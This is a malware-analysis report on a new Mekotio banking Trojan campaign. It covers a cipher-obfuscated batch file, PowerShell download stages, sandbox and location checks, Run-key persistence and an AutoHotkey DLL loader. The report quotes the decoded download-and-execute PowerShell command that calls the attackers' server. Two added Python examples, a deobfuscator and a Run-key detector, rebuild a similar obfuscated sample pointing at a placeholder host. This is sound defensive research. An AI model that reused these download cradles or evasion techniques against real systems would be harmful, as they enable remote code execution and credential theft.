Mekotio, a modular banking Trojan that targets Latin American countries, recently made a comeback with a new infection flow. The new campaign started right after the Spanish Civil Guard announced the arrest of 16 people involved in Mekotio distribution in July 2021. It appears that the group behind the malware was able to regroup quickly and change tactics to avoid detection.
We assess that the main cybercrime groups operate from Brazil and collaborated with Spanish gangs to distribute the malware. The arrests stopped the activity of the Spanish gangs, but not that of the main groups.
Mekotio’s new infection vector contains these unprecedented elements:
In the last three months, we saw approximately 100 attacks use a new, simple obfuscation technique, based on a substitution cipher, to hide the first module of the attack. This simple obfuscation is enough for the first stage to go undetected by most antivirus products.
Figure 1 – Low detection rate of Mekotio batch file on VirusTotal
During July and August, Check Point Threat Prevention Engine detected and blocked a wave of malicious batch files with unique obfuscation patterns. When we looked into it, we saw the following attack flow:
Figure 2 – Mekotio new attack flow
6. The three files are extracted and saved in a new directory on the infected system.
7. The PowerShell script calls the AutoHotkey interpreter to run the AHK script.
8. The AutoHotkey script runs the DLL payload.
9. The DLL contains the main Mekotio banker functionality, such as stealing access credentials for online banking portals, and a password stealer.
10. The stolen data is sent to the C&C server.
Let’s now take a closer look at the malware components.
The phishing email, written in Spanish, claims that a digital tax receipt is pending submission. When the victim clicks the link in the email, a malicious zip archive is downloaded from a malicious website.
Figure 3 – Phishing email
The batch file extracted from the first zip archive has two layers of obfuscation, and its file name often starts with "Contacto".
Figure 4 – Snippet of the obfuscated batch script
The first layer of obfuscation is a simple substitution cipher. A substitution cipher replaces each symbol of the plaintext with the corresponding symbol from a lookup table; since the table is fixed and shipped inside the script, deobfuscation only requires applying the inverse mapping. The source code of this obfuscation was probably taken from here.
Each batch file contains these two lines:
Figure 5 – Substitution arrays
These lines define the substitution table, and we can use them to deobfuscate the first layer.
After deobfuscating the first layer, we get another layer of obfuscation:
Figure 6 – Layer 2 of obfuscation
In this layer, slices of the command are stored in different environment variables. The values in lines 4-13 are concatenated, resulting in the following command:
powershell.exe -ep bypass -nop -win 1
A PowerShell command is also stored in the environment variable named "mEeWtg9Pxm" in this example (line 18); it is built by concatenating individual characters taken from the environment variable "o7cro6vX" (line 3).
Executing lines 3 and 18 yields the following PowerShell command:
Putting everything together, the batch file executes the following command:
echo iex("IEX(New-Object Net.WebClient).DownloadString('http://13[.]66.15.167/m/?a=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT')"); | powershell.exe -ep bypass -nop -win 1
When this command runs, the PowerShell script is downloaded directly into memory and executed by Invoke-Expression (IEX); nothing is written to disk at this stage.
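Both layers can be undone with one small expansion engine, because both rely on cmd.exe variable expansion: layer 1 turns every character into a %TABLE:~index,1% lookup into the two substitution tables, and layer 2 glues slices back together with %VAR% references. The script below is an added example, not code from the article or from the malware: it constructs its own two-layer batch file that mirrors the shape described above (the table names, the letter pool, the 192.0.2.10 URL and the token are invented), then decodes it. The only assumption about the real sample is that layer 1 uses cmd's substring syntax against the two arrays of Figure 5; the decoder also handles %VAR% and negative substring offsets, which goes beyond what the article shows.

```python
"""Two-layer batch deobfuscator for the substitution-cipher scheme.

Added example: the obfuscated script is constructed here; it is not the
Mekotio sample, and all names, tables and the URL are made up.
"""
import re
import string

# The command we expect to recover (constructed; 192.0.2.10 is a
# documentation-only address and the token is invented).
PS_COMMAND = ('iex("IEX(New-Object Net.WebClient)'
              '.DownloadString(\'http://192.0.2.10/m/?a=Z0DEX7\')")')
LAYER1_TABLES = {                     # the two "substitution arrays"
    'XpnFqmjf': (string.ascii_letters + string.digits)[::-1],
    'YtRwBcLd': ' =%:~,|.-()"\'/?;',
}
SET_RE = re.compile(r'^\s*set\s+(.+)$', re.IGNORECASE)
REF_RE = re.compile(r'^([A-Za-z0-9_]+)(?::~(-?\d+)(?:,(-?\d+))?)?$')


def substring(value, start, length):
    """cmd.exe %VAR:~start,len% semantics (negative values count from the end)."""
    if start < 0:
        start = max(len(value) + start, 0)
    if length is None:
        return value[start:]
    if length < 0:
        return value[start:len(value) + length]
    return value[start:start + length]


def expand(line, env):
    """One left-to-right pass resolving %VAR% and %VAR:~start,len%.

    '%%' yields a literal '%' as in a batch file. References to undefined
    variables are kept verbatim so the analyst sees what the script expected.
    """
    out, i, n = [], 0, len(line)
    while i < n:
        if line[i] != '%':
            out.append(line[i])
            i += 1
            continue
        if line[i + 1:i + 2] == '%':
            out.append('%')
            i += 2
            continue
        j = line.find('%', i + 1)
        if j < 0:                         # unmatched %: keep the remainder
            out.append(line[i:])
            break
        m = REF_RE.match(line[i + 1:j])
        if m and m.group(1) in env:
            value = env[m.group(1)]
            if m.group(2) is not None:
                length = int(m.group(3)) if m.group(3) is not None else None
                value = substring(value, int(m.group(2)), length)
            out.append(value)
        else:
            out.append(line[i:j + 1])
        i = j + 1
    return ''.join(out)


def parse_set(line):
    """Return (name, value) for `set NAME=value` or `set "NAME=value"`, else None."""
    m = SET_RE.match(line)
    if not m:
        return None
    rest = m.group(1)
    if rest.startswith('"') and rest.endswith('"'):
        rest = rest[1:-1]
    if '=' not in rest:
        return None
    name, value = rest.split('=', 1)
    return name.strip(), value


def deobfuscate(script, max_passes=8):
    """Walk the script top to bottom, recording every `set` and re-expanding
    each line until it stops changing (what `call` would do in cmd).
    Returns the fully resolved command lines and the final environment."""
    env, commands = {}, []
    for line in script.splitlines():
        for _ in range(max_passes):
            nxt = expand(line, env)
            if nxt == line:
                break
            line = nxt
        parsed = parse_set(line)
        if parsed:
            env[parsed[0]] = parsed[1]
        elif line.strip():
            commands.append(line)
    return commands, env


def to_lookups(text, tables):
    """Obfuscator side (used only to build the sample): every character of
    `text` becomes a %TABLE:~index,1% lookup into the first table holding it."""
    tokens = []
    for ch in text:
        for name, table in tables.items():
            idx = table.find(ch)
            if idx >= 0:
                tokens.append('%%%s:~%d,1%%' % (name, idx))
                break
        else:
            raise ValueError('no table contains %r' % ch)
    return ''.join(tokens)


def build_sample():
    """Constructed two-layer batch file: layer 2 slices the command across
    variables, then every layer-2 line is encoded with the layer-1 tables."""
    pool = ''.join(sorted(set(PS_COMMAND)))        # layer-2 letter pool
    layer2 = [
        'set o7cro6vX=' + pool,
        'set Kq1=power',
        'set Kq2=shell.exe -ep',
        'set Kq3= bypass -nop',
        'set Kq4= -win 1',
        'set mEeWtg9Pxm=' + to_lookups(PS_COMMAND, {'o7cro6vX': pool}),
        'echo %mEeWtg9Pxm% | %Kq1%%Kq2%%Kq3%%Kq4%',
    ]
    header = ['set "%s=%s"' % (name, table.replace('%', '%%'))
              for name, table in LAYER1_TABLES.items()]
    return '\n'.join(header + [to_lookups(l, LAYER1_TABLES) for l in layer2])


if __name__ == '__main__':
    for cmd in deobfuscate(build_sample())[0]:
        print(cmd)
```

On a real sample, feed the batch file text to deobfuscate() instead of build_sample(); the returned environment shows the decoded tables and the sliced variables, and the command list shows what cmd would finally execute.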
The first thing the script does is check the location of the infected system using the ipinfo.io service. If the system is not in one of these countries (Brazil, Chile, Mexico, Spain and Peru), the attack is terminated.
Figure 7 – Checking the location of the infected system
Next, the script checks whether it is running in a virtual machine: it compares the computer model with the strings 'VMware Virtual Platform' and 'Virtual Machine' (the model values reported by VMware and Hyper-V guests) and exits on a match. A sandbox that reports any other model string passes this check unnoticed.
Figure 8 – Checking if the computer is a virtual machine
Next, the script creates an empty marker file whose name is the current date. This tells it whether it has already run on the system that day: if the file already exists, the script stops.
Figure 9 – Footprint file creation
After checking the marker file, the script creates a directory with a random 8-character name, usually under the ProgramData directory.
Figure 10 – Creating a new directory
Next, a secondary zip file with a random file name is downloaded into this directory.
Figure 11 – Downloading the zip file
The downloaded zip archive contains three files: the Mekotio payload DLL, the AutoHotkey interpreter and an AutoHotkey script. After downloading the archive, the script extracts each file, renames it with a random name and saves it in the newly created directory.
The script uses the size of each extracted file to tell the three apart, and appends the extension that matches the detected file type. Note that this means the interpreter on disk does not carry the AutoHotkey name.
Figure 12 – Renaming files from the downloaded zip
After renaming the extracted files, a shortcut to the AutoHotkey interpreter is created in the AppData directory. The shortcut's arguments are the AutoHotkey script and the Mekotio DLL.
An AutoHotkey process is started using the shortcut.
Figure 13 – Creating the shortcut and starting AutoHotkey process
Finally, persistence is gained by adding a new value to the following registry key: “HKCU\Software\Microsoft\Windows\CurrentVersion\Run”
This runs the AutoHotkey with the AHK script and the Mekotio DLL as arguments.
Figure 14 – Adding a new value to the registry
The AHK script uses DllCall to invoke the DLL's fourth exported function. Because the DLL is loaded by the legitimate AutoHotkey interpreter, its execution looks like part of a normal AutoHotkey process. The final payload is the DLL containing the well-known and well-documented Mekotio banker.
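Because the interpreter, the script and the DLL are all renamed to random names, a hunt for this persistence cannot key on the string "AutoHotkey". What survives the renaming is the shape of the Run value: an executable in an 8-character ProgramData directory that is handed an .ahk file and a .dll file. The triage script below is an added example, not code from the article: it parses constructed `reg query` output for the HKCU Run key (the paths, value names and the benign entries are invented) and flags entries with that shape while leaving a legitimate hotkey user's AutoHotkey entry alone. On a real host you would feed it the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`; the "two or more indicators, one of them an .ahk argument" threshold is this example's own choice.

```python
"""Triage of HKCU Run values for the renamed-AutoHotkey + DLL loader shape.

Added example; the registry export below is constructed, not captured.
"""
import re

# Constructed output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    AHKHotkeys    REG_SZ    "C:\Program Files\AutoHotkey\AutoHotkey.exe" "C:\Users\bob\Documents\hotkeys.ahk"
    Wq9Lm4Rt    REG_SZ    "C:\ProgramData\kd8Fq2Lp\Ht7Xc2Qw.exe" "C:\ProgramData\kd8Fq2Lp\Wq9Lm4Rt.ahk" "C:\ProgramData\kd8Fq2Lp\Zx3Vb7Nm.dll"
"""

# `reg query` prints each value as: <4 spaces><name><4 spaces><type><4 spaces><data>
VALUE_RE = re.compile(r'^\s+(\S+)\s+(REG_\w+)\s+(.*\S)\s*$')
# Interpreter dropped into a directory with a random 8-character name under ProgramData.
RANDOM_PROGRAMDATA_EXE = re.compile(r'^[a-z]:\\programdata\\[a-z0-9]{8}\\[^\\]+$', re.I)

AHK_ARG = '.ahk script passed as an argument'
DLL_ARG = '.dll passed as an argument'
RANDOM_DIR = 'executable in an 8-character directory under ProgramData'


def split_cmdline(command):
    """Split a Windows command line on whitespace, honouring double quotes."""
    args, current, quoted = [], [], False
    for ch in command:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if current:
                args.append(''.join(current))
                current = []
        else:
            current.append(ch)
    if current:
        args.append(''.join(current))
    return args


def parse_reg_query(text):
    """Yield (value_name, data) pairs from `reg query` output."""
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            yield m.group(1), m.group(3)


def analyze(command):
    """Return the indicators present in one Run value's command line."""
    args = split_cmdline(command)
    if not args:
        return []
    exe, params = args[0], [p.lower() for p in args[1:]]
    reasons = []
    if RANDOM_PROGRAMDATA_EXE.match(exe):
        reasons.append(RANDOM_DIR)
    if any(p.endswith('.ahk') for p in params):
        reasons.append(AHK_ARG)
    if any(p.endswith('.dll') for p in params):
        reasons.append(DLL_ARG)
    return reasons


def is_loader_shape(reasons):
    """Flag an .ahk argument that travels with a DLL or with a random
    ProgramData interpreter; a lone .ahk is what a legitimate hotkey
    user's Run entry looks like and is not reported."""
    return AHK_ARG in reasons and len(reasons) >= 2


def scan(reg_query_text):
    """Return (value_name, command, reasons) for every suspicious Run value."""
    hits = []
    for name, command in parse_reg_query(reg_query_text):
        reasons = analyze(command)
        if is_loader_shape(reasons):
            hits.append((name, command, reasons))
    return hits


if __name__ == '__main__':
    for name, command, reasons in scan(SAMPLE_REG_QUERY):
        print('%s: %s\n  %s' % (name, command, '; '.join(reasons)))
```

The same analyze() function applies to process-creation telemetry (the command line of the AutoHotkey process started from the AppData shortcut) and to the shortcut's target and arguments, since the loader passes the same two files in all three places.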
Banking Trojans are a common malware used in attacks targeting countries in Latin America.
One characteristic of these bankers, Mekotio included, is their modular design, which lets the attackers change only a small part of the chain in order to evade detection.
CPR sees a lot of old malicious code reused for long periods, and yet the attacks manage to stay under the radar of AV and EDR solutions simply by changing packers or obfuscation techniques, such as a substitution cipher.
Our analysis of this campaign highlights the efforts attackers make to conceal their malicious intentions, bypass security filtering and trick users. To protect yourself against this type of attack, be suspicious of any email or message from a familiar brand or organization that asks you to click a link or open an attached document.
Here are some practical tips to help keep your data safe:
Organizations can prevent zero-day attacks with an end-to-end cyber architecture used to block deceptive phishing sites and provide alerts on password reuse in real time. Check Point Infinity is effective because it combines two key ingredients: full convergence across all attack surfaces and all attack vectors, and advanced prevention that can tackle the most sophisticated zero-day phishing and account takeover attacks.
Check Point Threat Emulation provides protection against this threat:
Indicators of Compromise
Links to first zip